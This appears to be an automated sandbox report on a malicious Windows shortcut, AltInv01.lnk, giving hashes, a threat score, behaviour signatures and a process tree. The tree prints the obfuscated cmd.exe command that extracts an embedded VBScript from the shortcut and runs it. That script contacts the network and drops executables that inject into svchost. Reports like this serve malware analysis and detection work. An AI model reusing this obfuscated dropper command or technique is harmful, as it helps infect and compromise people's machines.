Overview

overview

8

Static

static

AltInv01.lnk

windows7_x64

8

AltInv01.lnk

windows10_x64

8

Analysis

  • max time kernel
    122s
  • max time network
    90s
  • platform
    windows7_x64
  • resource
    win7v200213
  • submitted
    13-02-2020 20:53

Sharing

Copy URL
Twitter E-mail

General

  • Target

    AltInv01.lnk

  • Size

    19KB

  • MD5

    2aab065d8bd9c03615dbf58c6e08b680

  • SHA1

    552069e866b50513f720f080c1242fd5d7d80a0a

  • SHA256

    26c0dff81ed85b585506f0043d650f7b594225e697926b1c8e25680541b6b60d

  • SHA512

    780633ab6d15052300dff191e49e48eaf782cf62de75576c21123d05e3f158dd1c300e5f7869099741172ec8b556320bdecf489a4b4fc738924f2c57e6c9cf62

Score
8/10

Malware Config

Signatures

  • Blacklisted process makes network request 1 IoCs
  • Suspicious use of WriteProcessMemory 14 IoCs
  • Executes dropped EXE 2 IoCs
  • Suspicious use of SetWindowsHookEx 4 IoCs
  • Loads dropped DLL 2 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c C:\Users\Admin\AppData\Local\Temp\AltInv01.lnk
    1⤵
      PID:1600
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" /v:on /c del doGqH & if not exist oHfhW.txt (set "xsMWK=n" & set "iucqH=s") & fi!xsMWK!d!iucqH!tr "OzTAS.*" AltInv01.l!xsMWK!k > "C:\Users\Admin\AppData\Local\Temp\OBqOR.vb!iucqH!" & "C:\Users\Admin\AppData\Local\Temp\OBqOR.vb!iucqH!" & DtrqC
        2⤵
          PID:1640
          • C:\Windows\system32\findstr.exe
            findstr "OzTAS.*" AltInv01.lnk
            3⤵
              PID:1636
            • C:\Windows\System32\WScript.exe
              "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\OBqOR.vbs"
              3⤵
              • Blacklisted process makes network request
              • Suspicious use of WriteProcessMemory
              PID:1684
              • C:\Users\Admin\AppData\Local\Temp\lqPIJNPk.exe
                C:\Users\Admin\AppData\Local\Temp\lqPIJNPk.exe
                4⤵
                • Suspicious use of WriteProcessMemory
                • Executes dropped EXE
                • Suspicious use of SetWindowsHookEx
                • Loads dropped DLL
                PID:1472
                • C:\ProgramData\بابկողպեքドアЕЕقفلпԴուь;;;ռըсロックロック.exe
                  "C:\ProgramData\بابկողպեքドアЕЕقفلпԴուь;;;ռըсロックロック.exe"
                  5⤵
                  • Suspicious use of WriteProcessMemory
                  • Executes dropped EXE
                  • Suspicious use of SetWindowsHookEx
                  PID:1564
                  • C:\Windows\system32\svchost.exe
                    C:\Windows\system32\svchost.exe
                    6⤵
                      PID:1792

          Network

          MITRE ATT&CK Matrix

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\ProgramData\بابկողպեքドアЕЕقفلпԴուь;;;ռըсロックロック.exe
            Download Submit
          • C:\ProgramData\بابկողպեքドアЕЕقفلпԴուь;;;ռըсロックロック.exe
            Download Submit
          • C:\Users\Admin\AppData\Local\Temp\OBqOR.vbs
            Download Submit
          • C:\Users\Admin\AppData\Local\Temp\lqPIJNPk.exe
            Download Submit
          • C:\Users\Admin\AppData\Local\Temp\lqPIJNPk.exe
            Download Submit
          • \ProgramData\بابկողպեքドアЕЕقفلпԴուь;;;ռըсロックロック.exe
            Download Submit
          • \ProgramData\بابկողպեքドアЕЕقفلпԴուь;;;ռըсロックロック.exe
            Download Submit
          • memory/1472-3-0x00000000003B0000-0x00000000003E4000-memory.dmp
            Filesize

            208KB

            Download
          • memory/1564-8-0x0000000001EF0000-0x0000000001F24000-memory.dmp
            Filesize

            208KB

            Download
          • memory/1564-10-0x0000000001F30000-0x0000000001F61000-memory.dmp
            Filesize

            196KB

            Download
          • memory/1684-2-0x0000000002560000-0x0000000002564000-memory.dmp
            Filesize

            16KB

            Download